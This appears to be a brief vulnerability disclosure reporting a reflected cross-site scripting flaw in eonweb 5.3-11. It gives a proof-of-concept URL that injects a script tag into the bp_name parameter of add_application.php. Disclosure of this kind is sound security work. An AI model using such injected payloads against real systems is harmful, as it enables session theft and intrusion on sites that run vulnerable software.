Hello, we found the reflected xss. Tested on latest version [eonweb 5.3-11](https://github.com/EyesOfNetworkCommunity/eonweb/releases/tag/5.3-11)  POC: https://192.168.88.184/module/admin_bp/add_application.php?bp_name=%22%3E%3Cscript%3Ealert(1)%3C/script%3E